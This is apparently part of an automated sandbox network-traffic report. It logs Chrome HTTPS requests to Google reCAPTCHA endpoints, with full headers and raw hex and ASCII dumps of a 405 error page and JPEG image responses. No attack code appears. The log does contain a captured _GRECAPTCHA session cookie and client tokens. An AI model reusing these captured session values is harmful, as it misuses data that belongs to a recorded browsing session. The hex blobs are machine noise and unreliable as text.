                                              2024-09-27 06:18:16 UTC1390INData Raw: 6c 70 44 61 47 46 54 52 58 68 55 53 31 4d 72 65 58 6f 78 4e 55 56 59 65 48 6c 4a 53 30 4e 5a 59 55 78 30 5a 54 55 7a 53 58 64 56 52 46 51 76 63 31 52 53 4c 33 6c 33 4c 32 56 51 65 6d 4a 4e 51 56 5a 33 4f 46 42 35 59 7a 5a 59 55 58 52 6f 56 58 4a 69 65 6d 56 6f 4d 30 5a 72 64 58 6c 4f 65 6c 42 34 4e 47 52 73 62 30 64 73 57 6c 56 7a 62 54 42 4f 4e 57 56 4e 5a 6c 4d 72 59 30 70 53 54 6b 45 34 5a 47 52 34 4e 6e 46 6f 54 6c 56 6e 64 6b 78 58 61 33 4a 47 53 7a 52 31 61 6c 52 58 62 6d 52 31 54 6e 6c 36 62 79 39 6c 51 57 4e 31 4d 7a 4a 43 65 56 4a 54 57 6c 4e 6d 5a 45 45 33 4c 33 42 44 52 58 63 76 59 57 74 61 54 32 73 78 4e 58 56 7a 4e 47 56 56 61 6a 4a 45 59 30 70 75 4e 30 64 49 56 46 46 44 54 47 56 46 65 46 46 50 56 57 49 76 59 6b 6c 53 5a 43 74 47 5a 33 70 48
                                              Data Ascii: lpDaGFTRXhUS1MreXoxNUVYeHlJS0NZYUx0ZTUzSXdVRFQvc1RSL3l3L2VQemJNQVZ3OFB5YzZYUXRoVXJiemVoM0ZrdXlOelB4NGRsb0dsWlVzbTBONWVNZlMrY0pSTkE4ZGR4NnFoTlVndkxXa3JGSzR1alRXbmR1Tnl6by9lQWN1MzJCeVJTWlNmZEE3L3BDRXcvYWtaT2sxNXVzNGVVajJEY0puN0dIVFFDTGVFeFFPVWIvYklSZCtGZ3pH


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              21192.168.2.449782142.250.184.1964433104C:\Program Files\Google\Chrome\Application\chrome.exe
                                              TimestampBytes transferredDirectionData
                                              2024-09-27 06:18:18 UTC610OUTGET /recaptcha/api2/reload?k=6LdIzuYpAAAAAHT5nKyqfZa1ITwX_EWoYwnF-Nhd HTTP/1.1
                                              Host: www.google.com
                                              Connection: keep-alive
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                              Accept: */*
                                              X-Client-Data: CKq1yQEIi7bJAQiktskBCKmdygEIoOHKAQiWocsBCJz+zAEIhaDNAQi5ys0BCIrTzQEY9snNARjrjaUX
                                              Sec-Fetch-Site: none
                                              Sec-Fetch-Mode: cors
                                              Sec-Fetch-Dest: empty
                                              Accept-Encoding: gzip, deflate, br
                                              Accept-Language: en-US,en;q=0.9
                                              Cookie: _GRECAPTCHA=09AGteOyqMV3Be0uZmmDT5kMIC82z5hEj4NJ4LoRFWdAcp7XGN27cw8Qqkir_KSBtQmoc7xmYi1I_AakP1-FtY5aU
                                              2024-09-27 06:18:19 UTC743INHTTP/1.1 405 Method Not Allowed
                                              Content-Type: text/html; charset=utf-8
                                              Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                              Pragma: no-cache
                                              Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                              Date: Fri, 27 Sep 2024 06:18:18 GMT
                                              Report-To: {"group":"coop_38fac9d5b82543fc4729580d18ff2d3d","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/38fac9d5b82543fc4729580d18ff2d3d"}]}
                                              Cross-Origin-Opener-Policy-Report-Only: same-origin; report-to="coop_38fac9d5b82543fc4729580d18ff2d3d"
                                              Allow: POST
                                              Server: ESF
                                              X-XSS-Protection: 0
                                              X-Content-Type-Options: nosniff
                                              Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                              Accept-Ranges: none
                                              Vary: Accept-Encoding
                                              Connection: close
                                              Transfer-Encoding: chunked
                                              2024-09-27 06:18:19 UTC647INData Raw: 36 38 30 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 64 69 72 3d 6c 74 72 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 35 20 28 42 61 64 20 52 65 71 75 65 73 74 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f
                                              Data Ascii: 680<html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 405 (Bad Request)!!1</title><style>*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{backgro
                                              2024-09-27 06:18:19 UTC1024INData Raw: 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 6e 6f 6e 65 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 30 3b 6d 61 78 2d 77 69 64 74 68 3a 6e 6f 6e 65 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 30 7d 7d 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 31 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20 6e 6f 2d 72 65 70 65 61 74 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 2d 35 70 78 7d 40 6d 65 64 69 61 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 69 6e 2d 72 65 73 6f 6c 75 74 69 6f 6e 3a 31 39 32 64 70 69 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64
                                              Data Ascii: body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background
                                              2024-09-27 06:18:19 UTC5INData Raw: 30 0d 0a 0d 0a
                                              Data Ascii: 0


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              22192.168.2.449781216.58.206.364433104C:\Program Files\Google\Chrome\Application\chrome.exe
                                              TimestampBytes transferredDirectionData
                                              2024-09-27 06:18:18 UTC1152OUTGET /recaptcha/api2/payload?p=06AFcWeA6Tobub5P_1DSWkbyoqwTIdoYcHxHc3hU1RgDt9zmlJhA26OfMLmlBm2Bpo0Z1vb1zRt7gVcjl49Xc_8r1BmnMuhM2CvUmuS9DrPdBSuK5ed67e-F4_taLBnN48LcLXZHIb8mDXDHohSf2jtymIQBdc6XNv0be-uqWei-icZ-GS3nlXuLf5Y12YlYL5bL9j2WKLc2wi&k=6LdIzuYpAAAAAHT5nKyqfZa1ITwX_EWoYwnF-Nhd HTTP/1.1
                                              Host: www.google.com
                                              Connection: keep-alive
                                              sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                              sec-ch-ua-mobile: ?0
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                              sec-ch-ua-platform: "Windows"
                                              Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                              X-Client-Data: CKq1yQEIi7bJAQiktskBCKmdygEIoOHKAQiWocsBCJz+zAEIhaDNAQi5ys0BCIrTzQEY9snNARjrjaUX
                                              Sec-Fetch-Site: same-origin
                                              Sec-Fetch-Mode: no-cors
                                              Sec-Fetch-Dest: image
                                              Referer: https://www.google.com/recaptcha/api2/bframe?hl=en&v=xds0rzGrktR88uEZ2JUvdgOY&k=6LdIzuYpAAAAAHT5nKyqfZa1ITwX_EWoYwnF-Nhd
                                              Accept-Encoding: gzip, deflate, br
                                              Accept-Language: en-US,en;q=0.9
                                              Cookie: _GRECAPTCHA=09AGteOyqMV3Be0uZmmDT5kMIC82z5hEj4NJ4LoRFWdAcp7XGN27cw8Qqkir_KSBtQmoc7xmYi1I_AakP1-FtY5aU
                                              2024-09-27 06:18:19 UTC681INHTTP/1.1 200 OK
                                              Content-Type: image/jpeg
                                              Expires: Fri, 27 Sep 2024 06:18:19 GMT
                                              Date: Fri, 27 Sep 2024 06:18:19 GMT
                                              Cache-Control: private, max-age=30
                                              Cross-Origin-Resource-Policy: same-site
                                              Cross-Origin-Opener-Policy-Report-Only: same-origin; report-to="coop_38fac9d5b82543fc4729580d18ff2d3d"
                                              Report-To: {"group":"coop_38fac9d5b82543fc4729580d18ff2d3d","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/38fac9d5b82543fc4729580d18ff2d3d"}]}
                                              Transfer-Encoding: chunked
                                              Server: ESF
                                              X-XSS-Protection: 0
                                              X-Frame-Options: SAMEORIGIN
                                              X-Content-Type-Options: nosniff
                                              Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                              Connection: close
                                              2024-09-27 06:18:19 UTC709INData Raw: 62 39 39 31 0d 0a ff d8 ff e0 00 10 4a 46 49 46 00 01 02 00 00 01 00 01 00 00 ff db 00 43 00 05 03 04 04 04 03 05 04 04 04 05 05 05 06 07 0c 08 07 07 07 07 0f 0a 0b 09 0c 11 0f 12 12 11 0f 11 10 13 16 1c 17 13 14 1a 15 10 11 18 21 18 1a 1c 1d 1f 1f 1f 13 17 22 24 22 1e 24 1c 1e 1f 1e ff db 00 43 01 05 05 05 07 06 07 0e 08 08 0e 1e 14 11 14 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e ff c0 00 11 08 01 2c 01 2c 03 01 22 00 02 11 01 03 11 01 ff c4 00 1f 00 00 01 05 01 01 01 01 01 01 00 00 00 00 00 00 00 00 01 02 03 04 05 06 07 08 09 0a 0b ff c4 00 b5 10 00 02 01 03 03 02 04 03 05 05 04 04 00 00 01 7d 01 02 03 00 04 11 05 12 21 31 41 06 13 51 61 07 22 71
                                              Data Ascii: b991JFIFC!"$"$C,,"}!1AQa"q
                                              2024-09-27 06:18:19 UTC1390INData Raw: b0 c0 c9 21 b6 a0 56 0b b4 92 6d 78 5b 4e d0 6c 75 bd 43 5b 6f 1a 8b 16 d3 a0 c3 d8 8d 48 e9 45 e4 33 bc 93 5b 2f 97 e6 48 b1 2a 81 f2 c6 1f 7b b7 ca f9 07 1d ae 99 a4 69 de 26 f8 97 6c 35 cd 33 56 b9 8e e2 d1 52 39 9f 44 9d e0 b3 68 e1 99 55 5e 7b e2 c5 f0 1f 24 f9 41 64 91 62 72 01 de 0e 8d b6 ae 24 90 cf 0c f8 da d2 f3 51 d5 85 86 b9 1d a2 f8 7f 6e 2e 75 0d 7a e8 5a 25 a5 bc ca 82 78 ec ac e2 8a dd c3 2b a4 6b 08 70 18 aa 7c a4 96 2f a3 aa db a6 97 15 f6 a1 6e da 06 97 16 9c 96 f7 b7 09 6d a4 d8 69 51 da 3a b4 be 4c 92 c7 22 5d dc 0b 86 57 56 8d 4c 71 e1 58 8e 1c 94 af 41 f8 5b e2 c5 4b 28 3c 45 35 ea 6a 7a 6d fe 93 6b 01 9e 3f 3b fd 3b 54 53 2c 72 2c 4b 2b a4 56 ca 4c 6a a3 31 c4 b2 49 32 0d d9 c0 3c 46 a5 a5 dd eb 1f 12 9e d3 5e f0 b4 77 32 5c eb b7
                                              Data Ascii: !Vmx[NluC[oHE3[/H*{i&l53VR9DhU^{$Adbr$Qn.uzZ%x+kp|/nmiQ:L"]WVLqXA[K(<E5jzmk?;;TS,r,K+VLj1I2<F^w2\
                                              2024-09-27 06:18:19 UTC1390INData Raw: c6 ce ca 39 e6 b8 92 e6 75 11 99 23 86 39 00 97 cb 80 dc b3 2f 97 23 84 de c9 b7 6b 07 ee eb 99 f8 91 75 73 0f 86 de cf 4d d7 a1 d0 f5 6d 46 45 b2 d3 ee e4 b1 37 ac 93 3f 74 80 30 de c1 43 bf 3f 2a 04 67 70 51 1a a2 56 b0 8f 99 75 7d 23 c4 e9 e2 4f 12 78 54 ea 7e 2d f1 1f 87 27 d4 63 fb 75 90 96 f6 39 e2 d3 04 d3 33 b1 96 e1 a4 91 d3 0c 61 29 02 29 ba 48 90 c5 23 32 dc 28 ce f1 86 97 7f a8 7c 14 87 c4 fa 8b 78 4e d3 c6 7e 2a 82 d6 e9 42 df 34 57 7a e5 9a da 5b ef b6 20 46 24 77 95 d1 54 db db 98 d7 e7 41 bc 9d de 67 6c 35 9d 1e 7d 21 fc 41 a4 4b a6 f8 e3 56 d5 63 9e d2 d5 b4 eb 02 2d 2f cd fc 96 be 7c 33 c5 35 c4 8e d3 c3 14 31 c8 61 96 48 47 90 0a 00 a9 13 b4 59 5a 7d dc fa 87 c3 ad 3b c4 7a 66 ad 79 ae 6b 77 c6 e2 0f 0c 5c 5c db c7 71 3d b4 ff 00 d9 b3
                                              Data Ascii: 9u#9/#kusMmFE7?t0C?*gpQVu}#OxT~-'cu93a))H#2(|xN~*B4Wz[ F$wTAgl5}!AKVc-/|351aHGYZ};zfykw\\q=
                                              2024-09-27 06:18:19 UTC1390INData Raw: a2 f3 7c ec 2c 81 76 96 4d e1 01 67 01 c9 d7 b4 3e 1e b7 f1 0b 6b fa be b9 a5 e8 36 8d 77 6f 24 5a 9c 1a 7d de bd 34 c5 14 e5 12 ee e1 1a 35 61 8e 19 14 90 54 03 f7 08 38 b6 d0 a4 5a 85 a4 ed 35 ac 3f e9 4e 6f 66 8e fe 57 74 30 c4 84 8d ee ec 00 66 43 94 27 71 8c 21 20 14 25 69 dd 78 95 7c 5d 25 b4 3a 76 aa 74 b9 5b 2d 73 6d 74 44 de 6b 84 0a 8b 0a c8 7c bf 9b 73 a1 00 a6 f0 c7 70 20 91 42 9b 7a 1a 5b a9 d9 eb 73 78 0f 5a bf d6 6f 93 55 f1 d6 a9 e1 5b db c9 59 a3 d2 a3 b9 fb 05 90 31 a3 bc b3 89 10 61 84 cf 24 d8 5d c0 61 49 5f e1 2f 86 e5 f5 4b a8 66 d3 ac 75 0b 88 20 85 34 fb 0b 01 1d c5 d2 db 40 18 2f d9 66 86 37 48 54 90 10 cb e7 dc be 44 63 72 28 21 17 8a d5 e5 dd 6e 74 9d 43 c6 97 76 fa 4d e5 c4 70 4b a7 3c 69 22 db 88 c9 21 77 09 19 23 c1 41 91 1e
                                              Data Ascii: |,vMg>k6wo$Z}45aT8Z5?NofWt0fC'q! %ix|]%:vt[-smtDk|sp Bz[sxZoU[Y1a$]aI_/Kfu 4@/f7HTDcr(!ntCvMpK<i"!w#A
                                              2024-09-27 06:18:19 UTC1390INData Raw: a0 f7 e0 b6 d4 d6 1e 29 9b c1 d0 78 bf fe 12 1d 23 fb 3e db 4d 87 5f 8f c2 30 d8 15 86 0b 38 99 64 85 4d d2 8d c8 f8 8c 32 82 a1 59 e3 70 14 a2 3e 3c b3 c3 d6 76 76 bf 10 7c 33 fd 9f ad 5c c3 65 e1 7d 0e 2d 4e f2 f2 5b 73 13 c9 0b c8 d7 45 04 68 ef d5 2e 96 36 1b bf bf d4 60 35 eb ff 00 17 dc cb e1 fb e4 d3 3c 21 1f 86 3f e1 2a 06 08 f5 29 b3 7a 7c 96 48 d3 ec 89 b6 3f 32 28 99 63 1b 17 0c 07 44 50 30 c9 84 9c d7 c2 77 50 f6 7c af 98 ef ff 00 65 e5 d4 2e 7f 6a 67 5b 6b 48 fc 3f 1e 9d a3 dc 5a dd 43 11 7b 88 ef e0 b7 98 5b 46 11 e5 c3 00 bb 21 1b c0 e4 db 9c 81 bd 80 fb a0 0e 2b e2 2f d9 b2 54 d0 3e 31 5d 6a b7 96 d1 08 74 5d 13 49 f0 ed d3 5b 1d cf 71 73 77 3c 11 c5 2e 08 5c a2 9c 2b 12 77 05 55 c0 3f 74 7d b5 1b a4 83 2a c0 fe 34 ea 5d 6e 73 75 d0 7b 57
                                              Data Ascii: )x#>M_08dM2Yp><vv|3\e}-N[sEh.6`5<!?*)z|H?2(cDP0wP|e.jg[kH?ZC{[F!+/T>1]jt]I[qsw<.\+wU?t}*4]nsu{W
                                              2024-09-27 06:18:19 UTC1390INData Raw: d4 8c e0 8e 0e 05 69 6b 83 5e d7 b4 cd 42 fb 54 9e 19 62 44 73 ba 4b 70 1c 79 46 40 b1 8d ae 42 ed 66 90 e7 93 c8 c9 60 4a 8c ed 0a fe 43 e2 57 d2 f5 bd 62 61 a5 cf 2f d8 6e e6 5d a8 63 0f c1 61 bb e5 50 0a 60 93 9c 02 c4 72 73 5e a1 af 78 43 c0 da 17 80 a6 d7 2c 57 c5 1a 9d ee b5 a4 5f 4d a7 5c 6a 16 cd 27 95 14 4e 15 a5 da aa 0c 6b 27 9c ae 1d c6 36 b6 49 5d c4 36 49 5d b2 d5 93 3a 1f 80 5e 30 f1 4c 1a 96 ab a4 5d 58 7f c2 63 6b 6b 63 64 f0 14 ba b7 49 10 b1 55 90 06 60 bb c9 53 23 8d ec 32 22 00 91 bc 35 5e d7 bc 47 a9 f8 7f c4 fa ce 9f 7b a0 f8 ab 5e 5f b6 b4 b6 d7 16 5a 1a f9 31 42 e1 59 21 56 56 f9 f6 64 82 c7 92 73 9e 95 c4 7c 39 d3 bc 35 27 c1 c1 65 0c be 1b 87 5e f1 04 f0 43 25 96 ab 71 71 b6 f5 56 e8 c7 1e 16 19 04 88 77 e0 ee 50 57 2a c0 80 32
                                              Data Ascii: ik^BTbDsKpyF@Bf`JCWba/n]caP`rs^xC,W_M\j'Nk'6I]6I]:^0L]XckkcdIU`S#2"5^G{^_Z1BY!VVds|95'e^C%qqVwPW*2
                                              2024-09-27 06:18:19 UTC1390INData Raw: 03 9b 3a 3d af 85 ee be 0f f8 a3 48 f1 34 4c af 67 67 73 a9 69 06 e2 ed a0 11 dc 21 90 79 7e 42 2c 6b 19 57 ba 88 a8 61 99 45 c4 67 68 00 47 1e aa a7 2c 79 4c a4 ae ee 74 5f 17 34 df 05 db f8 9a 2d 02 7b dd 56 d3 4d d4 3c 40 4d ac da 78 ff 00 48 b8 d4 cc ae f3 4f e6 93 e5 08 62 37 69 01 21 3c d2 f1 ed 24 88 06 7c c7 56 1e 1e d4 3c db 1d 27 e3 34 64 6a 7b 63 b8 86 f3 48 9a d6 2d e5 0e 5b 7a a6 d8 d5 e5 3f 37 0a 02 bb 16 2e 41 dd e9 3f 19 fc 77 e1 3d 53 5d f0 5e a1 a8 eb 6f 6d af e8 b0 6f bb d3 a6 b2 b9 b3 50 d7 10 46 f9 91 d0 48 62 0b 81 98 d7 ce c9 60 8d f2 ee 61 e7 be 39 f8 49 f1 53 c3 10 e8 be 0d d4 7e cf 7b a6 df 4f 12 45 35 b5 9c b2 5a da 3c b3 04 8c c9 72 61 01 0b 3b 91 80 c5 b0 70 46 18 03 8a 9b 6e ec b8 ad 07 58 e9 5a 4c 7f 13 3c 47 67 2d fd f4 fa
                                              Data Ascii: :=H4Lggsi!y~B,kWaEghG,yLt_4-{VM<@MxHOb7i!<$|V<'4dj{cH-[z?7.A?w=S]^omoPFHb`a9IS~{OE5Z<ra;pFnXZL<Gg-
                                              2024-09-27 06:18:19 UTC1390INData Raw: ac 62 ee da e5 8e e5 59 9e 1f df 48 dc f1 bf 2e 9c 8c 80 38 20 8b 3f 6f 96 d3 c3 96 29 1e b3 75 6d 0d ad a5 91 90 db 58 09 f7 44 51 f7 4a 09 04 aa 90 3a b0 05 7c a3 f2 9d c0 11 2b 30 7e f2 b1 cf e8 3a 05 af fc 4b ad ae b0 97 6c 11 ca 3e 89 3a 48 08 2b 91 e6 0c 0f 94 90 0b e3 1d 09 eb cc 91 69 3a bd 85 dc 97 9a 7e bd 35 c7 fa 4c 88 f1 9d 2e 79 22 dc 84 e5 46 03 10 bb b0 b9 18 e3 38 24 ae 2b 69 ee b5 85 b7 d3 85 97 fc 24 8a b3 5f ec b8 6b 98 60 f3 12 37 50 db 8e 11 b0 a0 b7 1c 60 61 d4 ed c2 81 1c 33 eb b1 de c1 1c 1a 6f 88 6f 0c b3 cd f2 4d 71 1a 13 b3 0c bb ca ae d4 52 e5 80 c3 0c a8 fe 35 da 81 d9 24 21 fa 7e 99 a8 6b 36 ea ba f6 a3 a3 a4 69 1a f9 73 d9 b3 47 72 b2 b3 18 86 e0 e0 05 27 f7 8b 8d a0 86 e0 00 47 18 7e 3e d3 65 d1 b4 4b 19 a2 da 6f 65 ba 89
                                              Data Ascii: bYH.8 ?o)umXDQJ:|+0~:Kl>:H+i:~5L.y"F8$+i$_k`7P`a3ooMqR5$!~k6isGr'G~>eKoe
                                              2024-09-27 06:18:19 UTC1390INData Raw: 33 cc 67 92 42 a4 80 4c a4 96 71 fd d2 dc 85 20 61 7e e8 d6 0b c7 4a 8f cb 48 25 cc 56 b9 37 12 66 67 40 a3 04 26 37 b7 20 9e 11 57 8c 9f bb d8 64 5a 8d 8c db b9 2e 38 a8 a6 b4 b7 9b ce 2c 9b 64 9a 2f 2a 49 23 25 24 2a 33 81 bd 70 c3 1b 98 8c 1e 09 24 52 d8 cd 24 f6 a9 2c d6 93 5a 3b 67 30 cc 50 ba f3 8e 76 33 2f bf 04 f5 a7 ce 25 28 04 2e 88 db 94 92 ca 58 6d c8 dc 30 08 e4 8c 80 7b 12 0e 0e 30 68 94 8e 47 e2 27 86 2d 75 73 a7 5c 0b 5d 58 98 2f 92 6b 87 d2 ed 77 4a a8 c5 23 69 4b 85 66 0c 80 21 01 43 33 04 fb b8 5d d1 f3 7a a6 9f a5 69 b6 be 25 81 ed 6f ee 12 5b 6b bb 3d 2e f2 ea 26 df 18 b6 8e 73 33 0b 84 ce 5e 69 fe d0 4c 64 ae 51 1b 77 ca 51 1b b1 d4 b5 16 9e 05 55 d0 62 bb 9a eb 4d 9a 0b a5 96 59 a2 64 81 fc 86 9a 38 e3 da af 20 60 ca 0b aa ee 4d a7
                                              Data Ascii: 3gBLq a~JH%V7fg@&7 WdZ.8,d/*I#%$*3p$R$,Z;g0Pv3/%(.Xm0{0hG'-us\]X/kwJ#iKf!C3]zi%o[k=.&s3^iLdQwQUbMYd8 `M
                                              2024-09-27 06:18:19 UTC1390INData Raw: f9 00 0c b8 c6 08 cf 51 cf 6a e8 a4 d3 66 15 22 f4 35 7c 37 a2 ea 7b ac 2e 2d 19 23 8d 65 fb 3d c4 d6 b7 11 a9 85 fc e0 14 12 7d 98 7c a7 76 e3 80 54 12 0d 6f 5f 69 ba f6 a0 96 96 37 3a 8a 4f b0 b4 e6 0b 89 e3 8e e8 5d 06 2e d1 26 00 2d e5 ae d3 90 63 0c 24 04 30 42 36 e3 68 9e 29 b7 b0 d3 74 e6 b6 d3 ad a6 ba b4 67 68 5d f1 17 94 5b 82 08 1d 37 a1 61 9e 9b b6 9c 74 c6 96 93 e3 d5 b0 8e c3 4d b2 b5 68 ac 5a 5b 89 24 8f 6a 46 53 7b b3 2a 6d c9 c2 ae fc e0 60 90 14 8e 32 a7 b5 36 b4 4c 98 c6 1b b1 2d 66 b2 17 2b e7 4d ae cd e4 c5 72 d6 f3 5b 5f ac eb 2a 88 cc 7e 60 25 db f7 9f 31 2b b5 57 05 f1 82 14 9a a7 37 8a f4 84 d3 ed 74 79 f4 ed 6a 68 23 11 c6 b1 5c a2 66 55 42 4a 29 51 81 c1 23 a0 05 b6 a8 62 47 07 98 b5 bd 96 db c8 6d 36 da 24 79 52 35 79 1a 1c 1f
                                              Data Ascii: Qjf"5|7{.-#e=}|vTo_i7:O].&-c$0B6h)tgh][7atMhZ[$jFS{*m`26L-f+Mr[_*~`%1+W7tyjh#\fUBJ)Q#bGm6$yR5y


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              23192.168.2.449788142.250.184.1964433104C:\Program Files\Google\Chrome\Application\chrome.exe
                                              TimestampBytes transferredDirectionData
                                              2024-09-27 06:18:19 UTC820OUTGET /recaptcha/api2/payload?p=06AFcWeA6Tobub5P_1DSWkbyoqwTIdoYcHxHc3hU1RgDt9zmlJhA26OfMLmlBm2Bpo0Z1vb1zRt7gVcjl49Xc_8r1BmnMuhM2CvUmuS9DrPdBSuK5ed67e-F4_taLBnN48LcLXZHIb8mDXDHohSf2jtymIQBdc6XNv0be-uqWei-icZ-GS3nlXuLf5Y12YlYL5bL9j2WKLc2wi&k=6LdIzuYpAAAAAHT5nKyqfZa1ITwX_EWoYwnF-Nhd HTTP/1.1
                                              Host: www.google.com
                                              Connection: keep-alive
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                              Accept: */*
                                              X-Client-Data: CKq1yQEIi7bJAQiktskBCKmdygEIoOHKAQiWocsBCJz+zAEIhaDNAQi5ys0BCIrTzQEY9snNARjrjaUX
                                              Sec-Fetch-Site: none
                                              Sec-Fetch-Mode: cors
                                              Sec-Fetch-Dest: empty
                                              Accept-Encoding: gzip, deflate, br
                                              Accept-Language: en-US,en;q=0.9
                                              Cookie: _GRECAPTCHA=09AGteOyqMV3Be0uZmmDT5kMIC82z5hEj4NJ4LoRFWdAcp7XGN27cw8Qqkir_KSBtQmoc7xmYi1I_AakP1-FtY5aU
                                              2024-09-27 06:18:20 UTC681INHTTP/1.1 200 OK
                                              Content-Type: image/jpeg
                                              Expires: Fri, 27 Sep 2024 06:18:20 GMT
                                              Date: Fri, 27 Sep 2024 06:18:20 GMT
                                              Cache-Control: private, max-age=30
                                              Cross-Origin-Resource-Policy: same-site
                                              Report-To: {"group":"coop_38fac9d5b82543fc4729580d18ff2d3d","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/38fac9d5b82543fc4729580d18ff2d3d"}]}
                                              Cross-Origin-Opener-Policy-Report-Only: same-origin; report-to="coop_38fac9d5b82543fc4729580d18ff2d3d"
                                              Transfer-Encoding: chunked
                                              Server: ESF
                                              X-XSS-Protection: 0
                                              X-Frame-Options: SAMEORIGIN
                                              X-Content-Type-Options: nosniff
                                              Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                              Connection: close
                                              2024-09-27 06:18:20 UTC709INData Raw: 62 39 39 31 0d 0a ff d8 ff e0 00 10 4a 46 49 46 00 01 02 00 00 01 00 01 00 00 ff db 00 43 00 05 03 04 04 04 03 05 04 04 04 05 05 05 06 07 0c 08 07 07 07 07 0f 0a 0b 09 0c 11 0f 12 12 11 0f 11 10 13 16 1c 17 13 14 1a 15 10 11 18 21 18 1a 1c 1d 1f 1f 1f 13 17 22 24 22 1e 24 1c 1e 1f 1e ff db 00 43 01 05 05 05 07 06 07 0e 08 08 0e 1e 14 11 14 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e ff c0 00 11 08 01 2c 01 2c 03 01 22 00 02 11 01 03 11 01 ff c4 00 1f 00 00 01 05 01 01 01 01 01 01 00 00 00 00 00 00 00 00 01 02 03 04 05 06 07 08 09 0a 0b ff c4 00 b5 10 00 02 01 03 03 02 04 03 05 05 04 04 00 00 01 7d 01 02 03 00 04 11 05 12 21 31 41 06 13 51 61 07 22 71
                                              Data Ascii: b991JFIFC!"$"$C,,"}!1AQa"q
